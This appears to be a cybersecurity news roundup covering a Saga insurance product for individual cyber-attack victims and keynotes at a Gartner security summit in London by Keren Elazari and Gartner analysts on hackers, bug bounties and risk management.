“As the majority of our personal transactions are now conducted online, [we] need to ensure we are protected from a personal perspective, in the event of becoming a victim of a cyber-attack,” said Simon Mcphee, head of Saga Home Insurance. “Many of our Saga members have embraced digital apps and platforms and have integrated these into their day to day lives. However, as technology continues to evolve, so do the methods used for online fraud and cyber scams.”
While many insurers offer plans that cover cyber risks in the commercial sector, none to date have extended that coverage to individuals, according to Saga. As part of the legal cover add-on, the plan will restore electronic devices to their previous states, where possible. In addition, the coverage offers reimbursement for subscriptions to credit-monitoring companies following a cyber-attack and includes an advice line where customers can talk about their cybersecurity concerns.
“We are excited to be able to offer our customers a unique product, which has been developed to help with issues they have told us they have real concerns about. In addition to assisting our customers in the event of becoming a victim of a cyber-attack, there is also an advice line to discuss cyber-attack matters that may be of concern.”
Speaking in the guest keynote at the Gartner security summit in London, security researcher and self-declared hacker Keren Elazari said that the security landscape has evolved to a point where hackers are needed, as cyber-criminals seek new ways to earn money.
She highlighted the emergence of cryptomining efforts and software, particularly in the cases of Starbucks and Tesla, and said that while ransomware was last year’s trend, it was “not time to say goodbye.”
As well as her role model, Angelina Jolie’s character from the 1995 film Hackers, she praised Marcus Hutchins as the “savior of WannaCry”, Barnaby Jack and those who built tools including Shodan, Metasploit and haveibeenpwned.
She said: “I grew up as a hacker and didn’t think I was doing anything wrong, and didn’t imagine myself as a hoodie-wearing hacker, I was a creative and curious child and was always asking questions until 1993 when the internet came to Israel.”
Elazari said that “a world of hackers” needs to be enlisted, as the “world is more complicated than before and we cannot do what we did in the past,” and that is why an immune system is needed.
She said that this includes deploying bug bounty programs and tapping into hacker conferences like DEFCON, where she said she “sees 30,000 talented individuals.”
Concluding with predictions, she said that cyber-criminals are continuing to evolve “and go big and upstream” using evasive attacks with legitimate tools which exist in the infrastructure. This means that better strategies to deal with attacks and response should be created.
She also said that decisions need to be made on who stands on the front lines, as everyday users and individuals “make hundreds of security decisions every day,” and while many are assisted and helped by brilliant security officers, they need the tools to make better decisions.
“Some are based on machine learning and algorithms, and help defend organizations better,” she said. “The future will be defined by conflicts between humans and machines, but how do you enlist help as humans will always outsmart machines - bring the hacker mindset into your organization and you can start today.”
With security professionals overwhelmed, they need to be able to achieve successful results by asking three key questions: what’s important, what’s real and what’s dangerous.
Delivering the opening keynote at the Gartner Security Summit, research directors Patrick Hevesi and Steve Riley, and principal research analyst Sam Olyaei, said that security is “no longer the same” as components have turned cybersecurity into a “viable public opinion issue.”
Riley argued that professionals are “overwhelmed” by a shortage of risk management expertise, as risk management often “takes a backseat” to what needs to be done first and to disputes over priorities. “We want to empower you with resources for the greatest impact, to empower you to adapt processes, people and technologies,” he said, so that the audience can prioritize, adapt, transform and scale.
Riley said: “The key to empowerment is finding and shaping outcomes, and empowering the users and organizations who depend on you.”
Looking at the three questions, Olyaei encouraged the audience to factor them “for better collaboration, and to consider the customer impact of security controls.”
He added: “Effective communications make risk management real, and Gartner research shows a cultural disconnect between security and the rest of the business. It becomes too easy for significant miscommunication to happen.
“Understand and learn how business departments work, and build message plans tailored to these audiences, so it can align to their goals.”
The analysts gave further examples of “urgent crisis for threat” in the Spectre/Meltdown bugs from January, and “technology transformation” in use of the cloud and hosted email services.
Speaking on cloud, Hevesi said that moving to the cloud requires controls “which are appropriate for the environment you are protecting and any transformation you undergo,” and he said any controls should be adaptive to the technology “as the compliance landscapes evolve.”
Riley concluded by saying that applying the three questions can help you move from overwhelmed to successful, while Hevesi said that each scenario “shows a level of clarity and inspires an action,” and the analysts encouraged the audience to apply the risk strategy to future scenarios and the three questions.
“They are equally powerful whether you are facing an individual, organizational or global scenario,” Hevesi said.